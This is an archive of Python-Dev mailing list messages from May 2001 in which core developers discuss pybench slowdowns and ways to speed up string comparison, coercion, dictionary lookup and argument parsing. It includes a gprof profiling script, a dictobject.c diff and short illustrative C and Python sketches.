> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?
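To make the dispatch-order idea concrete, here is a Python model of a BINARY_ADD handler that checks exact types before falling into the general machinery. It is not ceval.c: the AddStats counters and the binary_add function are hypothetical, and operator.add merely stands in for the full PyNumber_Add coercion path.

```python
import operator


class AddStats(object):
    """Counts which path each addition took (hypothetical instrumentation)."""

    def __init__(self):
        self.int_fast = 0
        self.str_fast = 0
        self.generic = 0


def binary_add(v, w, stats):
    """Model of a BINARY_ADD handler with type-specific fast paths."""
    # Exact type checks, so subclasses still take the generic path.
    if type(v) is int and type(w) is int:
        stats.int_fast += 1   # the existing int+int special case
        return v + w
    if type(v) is str and type(w) is str:
        stats.str_fast += 1   # the suggested str+str special case
        return v + w          # concatenate without trying numeric coercion
    stats.generic += 1        # stand-in for the full PyNumber_Add machinery
    return operator.add(v, w)
```

With both checks in place, `"ab" + "cd"` never reaches the coercion attempts that dominate the CreateStringsWithConcat profile.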

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This test spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Sat May 19 00:06:05 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
	<200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):
       LDFLAGS="-pg" OPT="-pg" ./configure
       make
   When you run python it produces a gmon.out file.  To run gprof, pass
   it the profiling-enabled executable and gmon.out.  It spits out the
   results on stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile(r'^([^:]+):(.*)')
rx_decl = re.compile(r'class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])


From jim at interet.com  Sat May 19 18:45:15 2001
From: jim at interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Somerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido at digicool.com  Sun May 20 01:18:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sun May 20 11:31:25 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").
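A minimal sketch of why the `c < 0` guard pays off: with an old-style 3-way compare, only a negative result is ambiguous, so the error indicator needs to be consulted only then. The names `err_flag`, `fake_err_occurred`, `compare_strs` and `cmp_then_check` are hypothetical stand-ins for the interpreter machinery, not CPython API.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical stand-in for the interpreter's error indicator. */
static int err_flag = 0;
static int err_queries = 0;   /* counts how often the indicator is consulted */

static int fake_err_occurred(void)
{
    err_queries++;
    return err_flag;
}

/* Old-style 3-way compare returning -1, 0 or 1.  In the real protocol a
   negative value may also mean "error", so only c < 0 is ambiguous. */
static int compare_strs(const char *a, const char *b)
{
    int c = strcmp(a, b);
    return (c > 0) - (c < 0);
}

/* Returns 1 if an error was detected, else 0 with the outcome stored. */
static int cmp_then_check(const char *a, const char *b, int *outcome)
{
    int c = compare_strs(a, b);
    /* Short-circuit: the error query runs only for negative results. */
    if (c < 0 && fake_err_occurred())
        return 1;
    *outcome = c;
    return 0;
}
```

For "equal" and "greater" outcomes no extra call is made; the artificial `"ab" < "cd"` case still pays for one query, as noted above.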

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!

> I'd still be in favour of giving strings a richcompare, since it
> allows us to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agree Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
		    || a->ob_sval[0] != b->ob_sval[0])
			goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.
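A self-contained sketch of the collapsed test, assuming a hypothetical `str_obj` that mimics the relevant part of PyStringObject: a length plus a buffer that always carries a trailing NUL, which is what makes reading `sval[0]` safe for empty strings. CPython 2.x used the older `ob_sval[1]` struct hack; this sketch uses a C99 flexible array member instead.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical mini string object: size bytes of data followed by a NUL. */
typedef struct {
    size_t size;
    char sval[];    /* C99 flexible array member */
} str_obj;

static str_obj *make_str(const char *s)
{
    size_t n;
    str_obj *o;

    assert(s != NULL);
    n = strlen(s);
    o = malloc(sizeof(str_obj) + n + 1);
    if (o == NULL)
        return NULL;
    o->size = n;
    memcpy(o->sval, s, n + 1);   /* copy the trailing NUL too */
    return o;
}

/* Returns 1 if equal, 0 otherwise. */
static int str_equal(const str_obj *a, const str_obj *b)
{
    /* Cheap rejections first: different lengths or different first bytes.
       No separate zero-length test: two empty strings both have
       sval[0] == '\0', pass this check, and memcmp of 0 bytes returns 0. */
    if (a->size != b->size || a->sval[0] != b->sval[0])
        return 0;
    return memcmp(a->sval, b->sval, a->size) == 0;
}
```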


From tim.one at home.com  Sun May 20 11:54:08 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).
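Tim's objection stands; the sketch below only shows how such a hint is commonly isolated if one were used at all: behind a macro that passes GCC's `__builtin_expect` hint and degrades to a plain test on other compilers. The `LIKELY`/`UNLIKELY` macro names and `bytes_equal` are hypothetical, not part of Python.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical portability macros: a branch-probability hint on
   GCC-compatible compilers, the unadorned test everywhere else.
   !!(x) normalizes any nonzero value to 1, the value the hint expects. */
#if defined(__GNUC__)
#  define LIKELY(x)   __builtin_expect(!!(x), 1)
#  define UNLIKELY(x) __builtin_expect(!!(x), 0)
#else
#  define LIKELY(x)   (x)
#  define UNLIKELY(x) (x)
#endif

/* Equality of two NUL-terminated buffers; the identity case is hinted as
   rare, so the compiler may move it off the straight-line path. */
static int bytes_equal(const char *a, const char *b)
{
    assert(a != NULL && b != NULL);
    if (UNLIKELY(a == b))
        return 1;
    return strcmp(a, b) == 0;
}
```

Whether the hint helps at all depends on the architecture and compiler, as described above; the result is the same either way.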

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anyway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!
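A sketch of that idea on raw byte strings: one `memcmp` over the common prefix settles all six operators, and Py_EQ/Py_NE can bail out on a length mismatch before touching any bytes. The `OP_*` constants are hypothetical, numbered to mirror CPython's Py_LT..Py_GE, and the function returns 1/0 where the real slot would return Py_True/Py_False.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical op codes; the numbering mirrors CPython's Py_LT..Py_GE. */
enum { OP_LT, OP_LE, OP_EQ, OP_NE, OP_GT, OP_GE };

/* Rich comparison of two byte strings, returning 1 (true) or 0 (false).
   No separate 3-way compare function is called. */
static int bytes_richcompare(const char *a, size_t alen,
                             const char *b, size_t blen, int op)
{
    int c;

    /* EQ/NE: a length mismatch settles it without looking at the bytes. */
    if ((op == OP_EQ || op == OP_NE) && alen != blen)
        return op == OP_NE;

    c = memcmp(a, b, alen < blen ? alen : blen);
    if (c == 0)   /* common prefix equal: the shorter string sorts first */
        c = (alen > blen) - (alen < blen);

    switch (op) {
    case OP_LT: return c < 0;
    case OP_LE: return c <= 0;
    case OP_EQ: return c == 0;
    case OP_NE: return c != 0;
    case OP_GT: return c > 0;
    case OP_GE: return c >= 0;
    }
    assert(0 && "unknown comparison op");
    return 0;
}
```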

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>.

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one at home.com  Sun May 20 12:13:14 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to the rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one at home.com  Sun May 20 13:05:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal at lemburg.com  Sun May 20 13:50:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. turning the VM into a register machine
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Sun May 20 13:52:40 2001
From: mwh at python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one at home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one at home.com  Sun May 20 14:57:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. turning the VM into a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one at home.com  Sun May 20 14:58:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one at home.com  Sun May 20 15:09:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.
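One possible shape for such a fast path, as a hypothetical sketch rather than anything in CPython: first find the format proper by stopping at a ":funcname" or ";message" decoration, then, if that is a bare "O" and exactly one argument was passed, hand the argument back without entering the general parser. Python objects and the argument tuple are replaced by `void *` pointers and a count; `format_body_len` and `parse_single_object` are invented names.

```c
#include <assert.h>
#include <stddef.h>

/* Length of the format proper: ":funcname" and ";error message"
   decorations at the end are not conversion codes. */
static size_t format_body_len(const char *fmt)
{
    size_t n = 0;

    assert(fmt != NULL);
    while (fmt[n] != '\0' && fmt[n] != ':' && fmt[n] != ';')
        n++;
    return n;
}

/* Hypothetical fast path: for a bare "O" with exactly one argument, store
   that argument in *out and return 1.  Return 0 to tell the caller to fall
   back to the general parser.  args/nargs stand in for a tuple. */
static int parse_single_object(void **args, size_t nargs,
                               const char *fmt, void **out)
{
    if (format_body_len(fmt) == 1 && fmt[0] == 'O' && nargs == 1) {
        *out = args[0];
        return 1;
    }
    return 0;
}
```

The table above suggests why "O" is the obvious first candidate; whether the extra check costs the other formats anything measurable would need timing.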

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz at rahul.net  Sun May 20 15:50:08 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to the rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin at loewis.home.cs.tu-berlin.de  Sun May 20 15:48:43 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.

Regards,
Martin


From guido at digicool.com  Sun May 20 15:56:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
             <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to the rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
> couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full
> cmp, so I put the dict oldcmp back in order to avoid having dict
> richcmp (potentially) compute cmp 3 times to fake one cmp.  But if
> dict richcmp knew a cmp outcome was desired, it could compute it
> with no extra work to speak of.  Then there would be no reason at
> all to hold on to the dict tp_compare slot.

I'm not sure I see the saving.  There's no real saving in time,
because you still have to make separate calls for EQ and CMP, right?

There might be a saving in code, but you could solve that internally
in dictobject.c by restructuring the code somewhat so that
dict_compare shared more with dict_richcompare, right?

It's mostly an API streamlining.  The other difference between
tp_compare and tp_richcompare is that the latter returns an object
which makes testing for errors unambiguous.

But (for several releases) we would still have to support tp_compare
for b/w compatibility with old 3rd party extensions.

> The list and tuple richcmps are also doing almost all the work needed to
> compute a 3-way cmp outcome.

Ditto.

--Guido van Rossum (home page: http://www.python.org/~guido/)


